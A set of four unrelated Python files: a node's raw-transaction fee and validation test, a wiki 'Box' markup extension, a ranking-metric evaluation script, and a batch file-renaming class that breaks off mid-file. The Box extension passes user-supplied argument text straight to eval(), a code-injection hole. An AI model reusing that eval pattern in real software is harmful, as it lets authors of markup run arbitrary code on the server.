inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : -1}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
# 10. invalid parameters - sequence number out of range
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 4294967296}]
outputs = { self.nodes[0].getnewaddress() : 1 }
assert_raises_rpc_error(-8, 'Invalid parameter, sequence number is out of range', self.nodes[0].createrawtransaction, inputs, outputs)
inputs = [ {'txid' : "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000", 'vout' : 1, 'sequence' : 4294967294}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
decrawtx= self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['vin'][0]['sequence'], 4294967294)
####################################
# TRANSACTION VERSION NUMBER TESTS #
####################################
# Test the minimum transaction version number that fits in a signed 32-bit integer.
# As transaction version is unsigned, this should convert to its unsigned equivalent.
tx = CTransaction()
tx.nVersion = -0x80000000
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x80000000)
# Test the maximum transaction version number that fits in a signed 32-bit integer.
tx = CTransaction()
tx.nVersion = 0x7fffffff
rawtx = ToHex(tx)
decrawtx = self.nodes[0].decoderawtransaction(rawtx)
assert_equal(decrawtx['version'], 0x7fffffff)
self.log.info('sendrawtransaction/testmempoolaccept with maxfeerate')
# Test a transaction with a small fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ "txid" : txId, "vout" : vout['n'] }]
# Fee 10,000 satoshis, (1 - (10000 sat * 0.00000001 SYS/sat)) = 0.9999
outputs = { self.nodes[0].getnewaddress() : Decimal("0.99990000") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 10,000 satoshis, ~100 b transaction, fee rate should land around 100 sat/byte = 0.00100000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']], 0.00001000)[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'], 0.00001000)
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'])
# Test a transaction with a large fee.
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 1.0)
rawTx = self.nodes[0].getrawtransaction(txId, True)
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('1.00000000'))
self.sync_all()
inputs = [{ "txid" : txId, "vout" : vout['n'] }]
# Fee 2,000,000 satoshis, (1 - (2000000 sat * 0.00000001 SYS/sat)) = 0.98
outputs = { self.nodes[0].getnewaddress() : Decimal("0.98000000") }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx)
assert_equal(rawTxSigned['complete'], True)
# Fee 2,000,000 satoshis, ~100 b transaction, fee rate should land around 20,000 sat/byte = 0.20000000 SYS/kB
# Thus, testmempoolaccept should reject
testres = self.nodes[2].testmempoolaccept([rawTxSigned['hex']])[0]
assert_equal(testres['allowed'], False)
assert_equal(testres['reject-reason'], 'max-fee-exceeded')
# and sendrawtransaction should throw
assert_raises_rpc_error(-25, 'Fee exceeds maximum configured by user (e.g. -maxtxfee, maxfeerate)', self.nodes[2].sendrawtransaction, rawTxSigned['hex'])
# and the following calls should both succeed
testres = self.nodes[2].testmempoolaccept(rawtxs=[rawTxSigned['hex']], maxfeerate='0.20000000')[0]
assert_equal(testres['allowed'], True)
self.nodes[2].sendrawtransaction(hexstring=rawTxSigned['hex'], maxfeerate='0.20000000')
if __name__ == '__main__':
RawTransactionsTest().main()
|
# This file is subject to the terms and conditions defined in
# file 'LICENSE', which is part of this source code package.
# Copyright (c) 2010 SKR Farms (P) LTD.
# -*- coding: utf-8 -*-
# Gotcha : none
# Notes : none
# Todo : none
# 1. Unit test case for this extension.
from zope.component import getGlobalSiteManager
from eazytext.extension import Extension
from eazytext.interfaces import IEazyTextExtensionFactory
from eazytext.lib import split_style
gsm = getGlobalSiteManager()
doc = """
h3. Box
: Description ::
Generate a box with title and content. Text within the curly braces
will be interpreted as the content and can contain EazyText text as well.
If title text is provided, then the extension can take parameter
''hide'' which can be used to shrink/expand box content.
Property key-value pairs accepts CSS styling attributes and other special
attributes like,
|= title | optional, title string
|= titlestyle | optional, title style string in CSS style format
|= contentstyle | optional, content style string in CSS style format
''Example''
> [<PRE{{{ Box hide
#{
# 'title' : 'Building Mnesia Database',
# 'titlestyle' : 'color: brown;',
# 'contentstyle' : 'color: gray;',
# 'border' : '1px solid gray',
# 'style' : { 'margin' : '10px', 'padding' : '10px' },
#}
This chapter details the basic steps involved when designing a Mnesia
database and the programming constructs which make different solutions
available to the programmer. The chapter includes the following sections,
* defining a schema
* the datamodel
* starting Mnesia
* creating new tables.
}}} >]
{{{ Box hide
#{
# 'title' : 'Building Mnesia Database',
# 'titlestyle' : 'color: brown;',
# 'contentstyle' : 'color: gray;',
# 'border' : '1px solid gray',
# 'style' : { 'margin' : '10px', 'padding' : '10px' },
#}
This chapter details the basic steps involved when designing a Mnesia database
and the programming constructs which make different solutions available to the
programmer. The chapter includes the following sections:
* defining a schema
* the datamodel
* starting Mnesia
* creating new tables.
}}}
"""
tmpl = """
<div class="etext-box" style="%s">
<div class="boxtitle" style="%s">
%s %s
</div>
<div class="boxcont" style="%s">%s</div>
</div>
"""
spantmpl = """
<span class="boxhide"> hide</span>
<span class="boxshow"> show</span>
"""
class Box( Extension ) :
_doc = doc
def __init__( self, props, nowiki, *args ) :
self.nowiki = nowiki
self.title = props.pop( 'title', '' )
boxstyle = props.pop( 'style', {} )
titlestyle = props.pop( 'titlestyle', {} )
contentstyle = props.pop( 'contentstyle', '' )
d_style, s_style = split_style( boxstyle )
self.style = s_style
self.css = {}
self.css.update( props )
self.css.update( d_style )
d_style, s_style = split_style( titlestyle )
self.titlestyle = s_style
self.title_css = {}
self.title_css.update( d_style )
d_style, s_style = split_style( contentstyle )
self.contentstyle = s_style
self.cont_css = {}
self.cont_css.update( d_style )
self.hide = 'hide' in args
def __call__( self, argtext ):
return eval( 'Box( %s )' % argtext )
def html( self, node, igen, *args, **kwargs ) :
from eazytext.parser import ETParser
fn = lambda (k, v) : '%s : %s' % (k,v)
boxstyle = '; '.join(map( fn, self.css.items() ))
if self.style :
boxstyle += '; %s ;' % self.style
titlestyle = '; '.join(map( fn, self.title_css.items() ))
if self.titlestyle :
titlestyle += '; %s ;' % self.titlestyle
contstyle = '; '.join(map( fn, self.cont_css.items() ))
if self.contentstyle :
contstyle += '; %s ;' % self.contentstyle
self.nowiki_h = ''
if self.nowiki :
etparser = ETParser(
skin=None,
nested=True,
lex_optimize=False,
yacc_optimize=False,
)
tu = etparser.parse( self.nowiki, debuglevel=0 )
self.nowiki_h = tu.tohtml()
if self.title :
html = tmpl % ( boxstyle, titlestyle, self.title, spantmpl,
contstyle, self.nowiki_h )
else :
html = tmpl % ( boxstyle, titlestyle, self.title, '',
contstyle, self.nowiki_h )
return html
# Register this plugin
gsm.registerUtility( Box(), IEazyTextExtensionFactory, 'Box' )
Box._doc = doc
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 30 13:13:44 2017
@author: larakamal
total evaluation evalutes the sorted documents
using precision and NDCG
change the directory of the sorted documents from lines 79-87
change the directory of the precision and NDCG graphs from
line 345 and 352
"""
from math import log10
import csv
import numpy as np
import pandas as pd
def getNDCG(list, k):
#convert to double
dcg = float(getDCG(list,k))
idcg = float(getIDCG(list,k))
ndcg = 0.0
if (idcg > 0.0):
ndcg = dcg/idcg
return ndcg
def getPrecision(list, k):
size = len(list)
if (size == 0 or k == 0):
return 0.0
if(k > size):
k = size
rel_doc_num = getRelevantDocNum(list,k)
#convert to double
precision = float(float(rel_doc_num)/float(k))
return precision
def getRelevantDocNum(list,k):
size = len(list)
if (size == 0 or k == 0):
return 0
if (k > size):
k = size
rel_num = 0
for i in range(k):
if list[i] > 5:
rel_num = rel_num + 1
return rel_num
def getDCG(list,k):
size = len(list)
if (size == 0 or k == 0):
return 0.0
if (k > size):
k = size
#convert to double
dcg = list[0]
dcg = float(dcg)
for i in range(1,k):
rel = list[i]
pos = i+1
rel_log = log10(pos)/log10(2)
rel_log = float(rel_log)
dcg = dcg + (rel/rel_log)
return dcg
def getIDCG(list, k):
# sort list
sortedList = list
sortedList = sorted(sortedList, key=int, reverse=True)
idcg = getDCG(sortedList, k)
return float(idcg)
def evaluate(algorithm):
path = "data/results/test/" + algorithm + "/"
#change directory of the ranked documents
dataframe1 = pd.read_csv(path + "gravity_sorted.csv")
dataframe2 = pd.read_csv(path + "ocean pressure_sorted.csv")
dataframe3 = pd.read_csv(path + "ocean temperature_sorted.csv")
dataframe4 = pd.read_csv(path + "ocean wind_sorted.csv")
dataframe5 = pd.read_csv(path + "pathfinder_sorted.csv")
dataframe6 = pd.read_csv(path + "quikscat_sorted.csv")
dataframe7 = pd.read_csv(path + "radar_sorted.csv")
dataframe8 = pd.read_csv(path + "saline density_sorted.csv")
dataframe9 = pd.read_csv(path + "sea ice_sorted.csv")
label1 = dataframe1.ix[:,10:11]
label2 = dataframe2.ix[:,10:11]
label3 = dataframe3.ix[:,10:11]
label4 = dataframe4.ix[:,10:11]
label5 = dataframe5.ix[:,10:11]
label6 = dataframe6.ix[:,10:11]
label7 = dataframe7.ix[:,10:11]
label8 = dataframe8.ix[:,10:11]
label9 = dataframe9.ix[:,10:11]
temp_list1 = label1['label'].tolist()
temp_list2 = label2['label'].tolist()
temp_list3 = label3['label'].tolist()
temp_list4 = label4['label'].tolist()
temp_list5 = label5['label'].tolist()
temp_list6 = label6['label'].tolist()
temp_list7 = label7['label'].tolist()
temp_list8 = label8['label'].tolist()
temp_list9 = label9['label'].tolist()
label_list1 = [];
label_list2 = [];
label_list3 = [];
label_list4 = [];
label_list5 = [];
label_list6 = [];
label_list7 = [];
label_list8 = [];
label_list9 = [];
for i in range(len(temp_list1)):
if temp_list1[i] == 'Excellent':
label_list1.append(7)
elif temp_list1[i] == 'Very good':
label_list1.append(6)
elif temp_list1[i] == 'Good':
label_list1.append(5)
elif temp_list1[i] == 'Ok':
label_list1.append(4)
elif temp_list1[i] == 'Bad':
label_list1.append(3)
elif temp_list1[i] == 'Very bad':
label_list1.append(2)
elif temp_list1[i] == 'Terrible':
label_list1.append(1)
else:
label_list1.append(0)
for i in range(len(temp_list2)):
if temp_list2[i] == 'Excellent':
label_list2.append(7)
elif temp_list2[i] == 'Very good':
label_list2.append(6)
elif temp_list2[i] == 'Good':
label_list2.append(5)
elif temp_list2[i] == 'Ok':
label_list2.append(4)
elif temp_list2[i] == 'Bad':
label_list2.append(3)
elif temp_list2[i] == 'Very bad':
label_list2.append(2)
elif temp_list2[i] == 'Terrible':
label_list2.append(1)
else:
label_list2.append(0)
for i in range(len(temp_list3)):
if temp_list3[i] == 'Excellent':
label_list3.append(7)
elif temp_list3[i] == 'Very good':
label_list3.append(6)
elif temp_list3[i] == 'Good':
label_list3.append(5)
elif temp_list3[i] == 'Ok':
label_list3.append(4)
elif temp_list3[i] == 'Bad':
label_list3.append(3)
elif temp_list3[i] == 'Very bad':
label_list3.append(2)
elif temp_list3[i] == 'Terrible':
label_list3.append(1)
else:
label_list3.append(0)
for i in range(len(temp_list4)):
if temp_list4[i] == 'Excellent':
label_list4.append(7)
elif temp_list4[i] == 'Very good':
label_list4.append(6)
elif temp_list4[i] == 'Good':
label_list4.append(5)
elif temp_list4[i] == 'Ok':
label_list4.append(4)
elif temp_list4[i] == 'Bad':
label_list4.append(3)
elif temp_list4[i] == 'Very bad':
label_list4.append(2)
elif temp_list4[i] == 'Terrible':
label_list4.append(1)
else:
label_list4.append(0)
for i in range(len(temp_list5)):
if temp_list5[i] == 'Excellent':
label_list5.append(7)
elif temp_list5[i] == 'Very good':
label_list5.append(6)
elif temp_list5[i] == 'Good':
label_list5.append(5)
elif temp_list5[i] == 'Ok':
label_list5.append(4)
elif temp_list5[i] == 'Bad':
label_list5.append(3)
elif temp_list5[i] == 'Very bad':
label_list5.append(2)
elif temp_list5[i] == 'Terrible':
label_list5.append(1)
else:
label_list5.append(0)
for i in range(len(temp_list6)):
if temp_list6[i] == 'Excellent':
label_list6.append(7)
elif temp_list6[i] == 'Very good':
label_list6.append(6)
elif temp_list6[i] == 'Good':
label_list6.append(5)
elif temp_list6[i] == 'Ok':
label_list6.append(4)
elif temp_list6[i] == 'Bad':
label_list6.append(3)
elif temp_list6[i] == 'Very bad':
label_list6.append(2)
elif temp_list6[i] == 'Terrible':
label_list6.append(1)
else:
label_list6.append(0)
for i in range(len(temp_list7)):
if temp_list7[i] == 'Excellent':
label_list7.append(7)
elif temp_list7[i] == 'Very good':
label_list7.append(6)
elif temp_list7[i] == 'Good':
label_list7.append(5)
elif temp_list7[i] == 'Ok':
label_list7.append(4)
elif temp_list7[i] == 'Bad':
label_list7.append(3)
elif temp_list7[i] == 'Very bad':
label_list7.append(2)
elif temp_list7[i] == 'Terrible':
label_list7.append(1)
else:
label_list7.append(0)
for i in range(len(temp_list8)):
if temp_list8[i] == 'Excellent':
label_list8.append(7)
elif temp_list8[i] == 'Very good':
label_list8.append(6)
elif temp_list8[i] == 'Good':
label_list8.append(5)
elif temp_list8[i] == 'Ok':
label_list8.append(4)
elif temp_list8[i] == 'Bad':
label_list8.append(3)
elif temp_list8[i] == 'Very bad':
label_list8.append(2)
elif temp_list8[i] == 'Terrible':
label_list8.append(1)
else:
label_list8.append(0)
for i in range(len(temp_list9)):
if temp_list9[i] == 'Excellent':
label_list9.append(7)
elif temp_list9[i] == 'Very good':
label_list9.append(6)
elif temp_list9[i] == 'Good':
label_list9.append(5)
elif temp_list9[i] == 'Ok':
label_list9.append(4)
elif temp_list9[i] == 'Bad':
label_list9.append(3)
elif temp_list9[i] == 'Very bad':
label_list9.append(2)
elif temp_list9[i] == 'Terrible':
label_list9.append(1)
else:
label_list9.append(0)
NDCG_list1 = []
NDCG_list2 = []
NDCG_list3 = []
NDCG_list4 = []
NDCG_list5 = []
NDCG_list6 = []
NDCG_list7 = []
NDCG_list8 = []
NDCG_list9 = []
for i in range(1,41):
k = i
NDCG_list1.append(getNDCG(label_list1,k))
NDCG_list2.append(getNDCG(label_list2,k))
NDCG_list3.append(getNDCG(label_list3,k))
NDCG_list4.append(getNDCG(label_list4,k))
NDCG_list5.append(getNDCG(label_list5,k))
NDCG_list6.append(getNDCG(label_list6,k))
NDCG_list7.append(getNDCG(label_list7,k))
NDCG_list8.append(getNDCG(label_list8,k))
NDCG_list9.append(getNDCG(label_list9,k))
precision_list1 = []
precision_list2 = []
precision_list3 = []
precision_list4 = []
precision_list5 = []
precision_list6 = []
precision_list7 = []
precision_list8 = []
precision_list9 = []
for i in range(1,41):
k = i
precision_list1.append(getPrecision(label_list1,k))
precision_list2.append(getPrecision(label_list2,k))
precision_list3.append(getPrecision(label_list3,k))
precision_list4.append(getPrecision(label_list4,k))
precision_list5.append(getPrecision(label_list5,k))
precision_list6.append(getPrecision(label_list6,k))
precision_list7.append(getPrecision(label_list7,k))
precision_list8.append(getPrecision(label_list8,k))
precision_list9.append(getPrecision(label_list9,k))
total_list_NDCG = []
for i in range(len(NDCG_list1)):
average = (NDCG_list1[i] + NDCG_list2[i]+ NDCG_list3[i] + NDCG_list4[i]+ NDCG_list5[i] + NDCG_list6[i] + NDCG_list7[i] + NDCG_list8[i] + NDCG_list9[i])/9
array = np.array([NDCG_list1[i],NDCG_list2[i], NDCG_list3[i], NDCG_list4[i], NDCG_list5[i], NDCG_list6[i], NDCG_list7[i], NDCG_list8[i], NDCG_list9[i], average])
total_list_NDCG.append(array)
total_list_precision = []
for i in range(len(precision_list1)):
average = (precision_list1[i] + precision_list2[i]+ precision_list3[i] + precision_list4[i]+ precision_list5[i] + precision_list6[i] + precision_list7[i] + precision_list8[i] + precision_list9[i])/9
array = np.array([precision_list1[i],precision_list2[i], precision_list3[i], precision_list4[i], precision_list5[i], precision_list6[i], precision_list7[i], precision_list8[i], precision_list9[i], average])
total_list_precision.append(array)
with open('data/results/rank/' + algorithm + 'NDCG_graph.csv', 'w', encoding = 'utf-8-sig') as outcsv:
writer = csv.writer(outcsv)
writer.writerow(['label'])
writer.writerow(['gravity', 'ocean_pressure', 'ocean_temperature', 'ocean_wind', 'pathfinder','quikscat', 'radar', 'saline_density','sea_ice', algorithm])
for i in total_list_NDCG:
writer.writerow(i)
with open('data/results/rank/' + algorithm + 'precision_graph.csv', 'w', encoding = 'utf-8-sig') as outcsv:
writer = csv.writer(outcsv)
writer.writerow(['label'])
writer.writerow(['gravity', 'ocean_pressure', 'ocean_temperature', 'ocean_wind', 'pathfinder','quikscat', 'radar', 'saline_density','sea_ice', algorithm])
for i in total_list_precision:
writer.writerow(i)
|
# -*- coding: utf-8 -*-
from operator import itemgetter
from unicodedata import normalize
import fnmatch
import logging
import os
import re
import string
import helpers
log = logging.getLogger("fileops")
class FileOps(object):
def __init__(self, casemode=0, countpos=0, dirsonly=False, exclude="",
filesonly=False, hidden=False, ignorecase=False,
interactive=False, keepext=False, mediamode=False,
noclobber=False, recursive=False, regex=False, remdups=False,
remext=False, remnonwords=False, remsymbols=False,
simulate=False, spacemode=0, quiet=False, verbosity=1,
matchpattern="", replacepattern="", recursivedepth=0):
# Universal options:
try:
self._casemode = int(casemode) # 0=lc, 1=uc, 2=flfw, 3=flew
except TypeError:
self._casemode = 0
try:
self._countpos = int(countpos) # Adds numerical index at position.
except TypeError:
self._countpos = 0
try:
self._spacemode = int(spacemode) # 0=su, 1=sh, 2=sd, 3=ds, 4=hs, 5=us
except TypeError:
self.spacemode = 0
self._dirsonly = dirsonly # Only edit directory names.
self._filesonly = False if dirsonly else filesonly # Only file names.
self._hidden = hidden # Look at hidden files and directories, too.
self._ignorecase = ignorecase # Case sensitivity.
self._interactive = interactive # Confirm before overwriting.
self._keepext = keepext # Don't modify remext.
self._mediamode = mediamode # Mode to sanitize NTFS-filenames/dirnames.
self._noclobber = noclobber # Don't overwrite anything.
self._recursive = recursive # Look for files recursively
self._regex = regex # Use regular expressions instead of glob/fnmatch.
self._remdups = remdups # Remove remdups.
self._remext = remext # Remove all remext.
self._remnonwords = remnonwords # Only allow wordchars (\w)
self._remsymbols = remsymbols # Normalize remsymbols (ñé becomes ne).
self._simulate = simulate # Simulate renaming and dump result to stdout.
# Initialize GUI options.
self._recursivedepth = recursivedepth
self._excludeedit = "" if not exclude else exclude
self._matchedit = "" if not matchpattern else matchpattern
self._replaceedit = "" if not replacepattern else replacepattern
self._autostop = False # Automatically stop execution on rename error.
self._countbase = 1 # Base to start counting from.
self._countfill = True # 9->10: 9 becomes 09. 99->100: 99 becomes 099.
self._countpreedit = "" # String that is prepended to the counter.
self._countstep = 1 # Increment per count iteration.
self._countsufedit = "" # String that is appended to the counter.
self._deletecheck = False # Whether to delete a specified range.
self._deleteend = 1 # End index of deletion sequence.
self._deletestart = 0 # Start index of deletion sequence.
self._filteredit = ""
self._insertcheck = False # Whether to apply an insertion.
self._insertedit = "" # The inserted text/string.
self._insertpos = 0 # Position/Index to insert at.
self._manualmirror = False # Mirror manual rename to all targets.
self._matchcheck = True # Whether to apply source/target patterns.
self._matchexcludecheck = False
self._matchfiltercheck = False
self._matchreplacecheck = True
self._casecheck = True if isinstance(casemode, str) else False
self._countcheck = True if isinstance(countpos, str) else False
removelist = [remdups, remext, remnonwords, remsymbols]
self._removecheck = True if any(removelist) else False
self._spacecheck = True if isinstance(spacemode, str) else False
self.stopupdate = False
self.stopcommit = False
self.includes = set()
self.excludes = set()
self.recursiveincludes = set()
self.recursiveexcludes = set()
self.configdir = helpers.get_configdir()
# Create the logger.
helpers.configure_logger(verbosity, quiet, self.configdir)
self.history = [] # History of commited operations, used to undo them.
# Match everything inside one set of braces:
self.bracerx = re.compile("(?<=\{)(.*?)(?=\})")
def match_filter(self, target):
if not self.filteredit:
return True
if "/" in self.filteredit:
patterns = self.filteredit.split("/")
else:
patterns = [self.filteredit]
if self.regex:
for pattern in patterns:
try:
if re.search(pattern, target, flags=self.ignorecase):
return True
except:
pass
else:
for pattern in patterns:
if fnmatch.fnmatch(target, pattern):
return True
return False
def match_exclude(self, target):
if not self.excludeedit:
return
if "/" in self.excludeedit:
patterns = self.excludeedit.split("/")
else:
patterns = [self.excludeedit]
if self.regex:
for pattern in patterns:
try:
if re.search(pattern, target, flags=self.ignorecase):
return False
except:
pass
else:
for pattern in patterns:
if fnmatch.fnmatch(target, pattern):
return False
def match(self, target):
"""Searches target for pattern and returns a bool."""
if not self.hidden and target.startswith("."):
return False
if self.matchexcludecheck:
if self.match_exclude(target) is False:
return False
if self.excludes and target in self.excludes:
return False
if self.includes and target in self.includes:
return True
if self.matchfiltercheck:
if self.match_filter(target) is False:
return False
return True
def get_dirs(self, root, dirs):
"""Sort, match and decode a list of dirs."""
return [(root, d.decode("utf-8"), u"") for d in dirs if self.match(d)]
def get_files(self, root, files):
"""Sort, match and decode a list of files."""
return [(root,) + os.path.splitext(f.decode("utf-8")) for f in
files if self.match(f)]
def get_targets(self, path=None):
"""Return a list of files and/or dirs in path."""
if not path:
path = os.getcwd()
# Determine recursion depth.
levels = 0
if self.recursive:
levels = self.recursivedepth
targets = []
for root, dirs, files in helpers.walklevels(path, levels):
# To unicode.
root = root.decode("utf-8") + "/"
if self.dirsonly:
target = self.get_dirs(root, dirs)
elif self.filesonly:
target = self.get_files(root, files)
else:
target = self.get_dirs(root, dirs) + self.get_files(root, files)
targets.extend(target)
if self.stopupdate:
return targets
return targets
def get_previews(self, targets, matchpat=None, replacepat=None):
"""Simulate rename operation on targets and return results as list."""
if matchpat:
self.matchedit = matchpat
if replacepat:
self.replaceedit = replacepat
if self.mediamode:
self.set_mediaoptions()
return self.modify_previews(targets)
def set_mediaoptions(self):
self.casecheck = True
self.spacecheck = True
self.removecheck = True
self.casemode = 0
self.spacemode = 6
self.remdups = True
self.keepext = True
self.remsymbols = True
def commit(self, previews):
# The sorted generator comprehension of (unicode)doom:
# Reverse sort the paths so that the longest paths are changed first.
# This should minimize rename errors for recursive operations, for now.
actions = sorted((("".join(i[0]).encode("utf-8"), i[0][0].encode("utf-8")
+ i[1].encode("utf-8")) for i in previews),
key=lambda i: i[0].count("/"), reverse=True)
for i in actions:
if self.simulate:
log.debug("{} -> {}.".format(i[0], i[1]))
continue
if self.stopcommit:
idx = actions.index(i)
log.warn("Stopping commit after {} renames." .format(idx + 1))
if idx:
log.warn("Use undo to revert the rename actions.")
self.history.append(actions[:idx + 1])
return
try:
os.rename(i[0], i[1])
except Exception as e:
log.debug("Rename Error: {} -> {} ({}).".format(i[0], i[1], e))
if self.autostop:
break
self.history.append(actions)
log.info("Renaming complete.")
def undo(self, actions=None):
if actions is None:
try:
actions = self.history.pop()
except IndexError:
log.error("History list is empty.")
return
for i in actions:
if self.simulate:
log.debug("{} -> {}.".format(i[1], i[0]))
continue
try:
os.rename(i[1], i[0])
except Exception as e:
log.error("Rename Error: {} -> {} ({}).".format(i[1], i[0], e))
if self.autostop:
break
log.info("Undo complete.")
def modify_previews(self, previews):
if self.countcheck:
lenp, base, step = len(previews), self.countbase, self.countstep
countlen = len(str(lenp))
countrange = xrange(base, lenp * step + 1, step)
if self.countfill:
count = (str(i).rjust(countlen, "0") for i in countrange)
else:
count = (str(i) for i in countrange)
modified = []
for preview in previews:
name = preview[1]
if not self.remext and not self.keepext:
name += preview[2]
if self.casecheck:
name = self.apply_case(name)
if self.spacecheck:
name = self.apply_space(name)
if self.deletecheck:
name = self.apply_delete(name)
if self.removecheck:
name = self.apply_remove(name)
if self.insertcheck:
name = self.apply_insert(name)
if self.matchcheck:
name = self.apply_replace(name)
if self.countcheck:
try:
name = self.apply_count(name, count.next())
except StopIteration:
pass
if self.keepext:
name += preview[2]
preview = ((preview[0], preview[1] + preview[2]), name)
modified.append(preview)
return modified
def apply_space(self, s):
if not self.spacecheck:
return s
if self.spacemode == 0:
s = s.replace(" ", "_")
elif self.spacemode == 1:
s = s.replace(" ", "-")
elif self.spacemode == 2:
s = s.replace(" ", ".")
elif self.spacemode == 3:
s = s.replace(".", " ")
elif self.spacemode == 4:
s = s.replace("-", " ")
elif self.spacemode == 5:
s = s.replace("_", " ")
elif self.spacemode == 6:
s = re.sub("[.\s]", "_", s)
return s
def apply_case(self, s):
if not self.casecheck:
return s
if self.casemode == 0:
s = s.lower()
elif self.casemode == 1:
s = s.upper()
elif self.casemode == 2:
s = s.capitalize()
elif self.casemode == 3:
s = " ".join([c.capitalize() for c in s.split()])
return s
def apply_insert(self, s):
if not self.insertcheck or not self.insertedit:
return s
s = list(s)
s.insert(self.insertpos, self.insertedit)
return "".join(s)
def apply_count(self, s, count):
if not self.countcheck:
return s
s = list(s)
if self.countpreedit:
count = self.countpreedit + count
if self.countsufedit:
count += self.countsufedit
s.insert(self.countpos, count)
return "".join(s)
def apply_delete(self, s):
if not self.deletecheck:
return s
return s[:self.deletestart] + s[self.deleteend:]
def apply_remove(self, s):
if not self.removecheck:
return s
if self.remnonwords:
s = re.sub("\W", "", s, flags=self.ignorecase)
if self.remsymbols:
allowed = string.ascii_letters + string.digits + " .-_+" # []()
s = "".join(c for c in normalize("NFKD", s) if c in allowed)
if self.remdups:
s = re.sub(r"([-_ .])\1+", r"\1", s, flags=self.ignorecase)
return s
def apply_replace(self, s):
if not self.matchreplacecheck or not self.matchedit:
return s
if not self.regex:
matchpat = fnmatch.translate(self.matchedit)
replacepat = helpers.translate(self.replaceedit)
else:
matchpat = self.matchedit
replacepat = self.replaceedit
try:
s = re.sub(matchpat, replacepat, s, flags=self.ignorecase)
except:
pass
return s
@property
def dirsonly(self):
return self._dirsonly
@dirsonly.setter
def dirsonly(self, boolean):
log.debug("dirsonly: {}".format(boolean))
self._dirsonly = boolean
if boolean:
self.filesonly = False
@property
def filesonly(self):
return self._filesonly
@filesonly.setter
def filesonly(self, boolean):
log.debug("filesonly: {}".format(boolean))
self._filesonly = boolean
if boolean:
self.dirsonly = False
@property
def recursive(self):
return self._recursive
@recursive.setter
def recursive(self, boolean):
log.debug("recursive: {}".format(boolean))
self._recursive = boolean
@property
def recursivedepth(self):
return self._recursivedepth
@recursivedepth.setter
def recursivedepth(self, num):
log.debug("recursivedepth: {}".format(num))
self._recursivedepth = num
@property
def hidden(self):
return self._hidden
@hidden.setter
def hidden(self, boolean):
log.debug("hidden: {}".format(boolean))
self._hidden = boolean
@property
def simulate(self):
return self._simulate
@simulate.setter
def simulate(self, boolean):
log.debug("simulate: {}".format(boolean))
self._simulate = boolean
@property
def interactive(self):
return self._interactive
@interactive.setter
def interactive(self, boolean):
log.debug("interactive: {}".format(boolean))
self._interactive = boolean
@property
def noclobber(self):
return self._noclobber
@noclobber.setter
def noclobber(self, boolean):
log.debug("noclobber: {}".format(boolean))
self._noclobber = boolean
@property
def keepext(self):
return self._keepext
@keepext.setter
def keepext(self, boolean):
log.debug("keepext: {}.".format(boolean))
self._keepext = boolean
@property
def regex(self):
return self._regex
@regex.setter
def regex(self, boolean):
log.debug("regex: {}.".format(boolean))
self._regex = boolean
@property
def varcheck(self):
return self._varcheck
@varcheck.setter
def varcheck(self, boolean):
log.debug("varcheck: {}".format(boolean))
self._varcheck = boolean
@property
def matchcheck(self):
return self._matchcheck
@matchcheck.setter
def matchcheck(self, boolean):
log.debug("matchcheck: {}".format(boolean))
self._matchcheck = boolean
@property
def matchexcludecheck(self):
return self._matchexcludecheck
@matchexcludecheck.setter
def matchexcludecheck(self, boolean):
log.debug("matchexcludecheck: {}".format(boolean))
self._matchexcludecheck = boolean
@property
def matchfiltercheck(self):
return self._matchfiltercheck
@matchfiltercheck.setter
def matchfiltercheck(self, boolean):
log.debug("matchfiltercheck: {}".format(boolean))
self._matchfiltercheck = boolean
@property
def matchreplacecheck(self):
return self._matchreplacecheck
@matchreplacecheck.setter
def matchreplacecheck(self, boolean):
log.debug("matchreplacecheck: {}".format(boolean))
self._matchreplacecheck = boolean
@property
def countpreedit(self):
return self._countpreedit
@countpreedit.setter
def countpreedit(self, text):
log.debug("countpreedit: {}".format(text))
self._countpreedit = text.decode("utf-8")
@property
def countsufedit(self):
return self._countsufedit
@countsufedit.setter
def countsufedit(self, text):
log.debug("countsufedit: {}".format(text))
self._countsufedit = text.decode("utf-8")
@property
def insertedit(self):
return self._insertedit
@insertedit.setter
def insertedit(self, text):
log.debug("insertedit: {}.".format(text))
self._insertedit = text.decode("utf-8")
@property
def matchedit(self):
return self._matchedit
@matchedit.setter
def matchedit(self, text):
log.debug("matchedit: {}.".format(text))
self._matchedit = text.decode("utf-8")
@property
def replaceedit(self):
return self._replaceedit
@replaceedit.setter
def replaceedit(self, text):
log.debug("replaceedit: {}.".format(text))
self._replaceedit = text.decode("utf-8")
@property
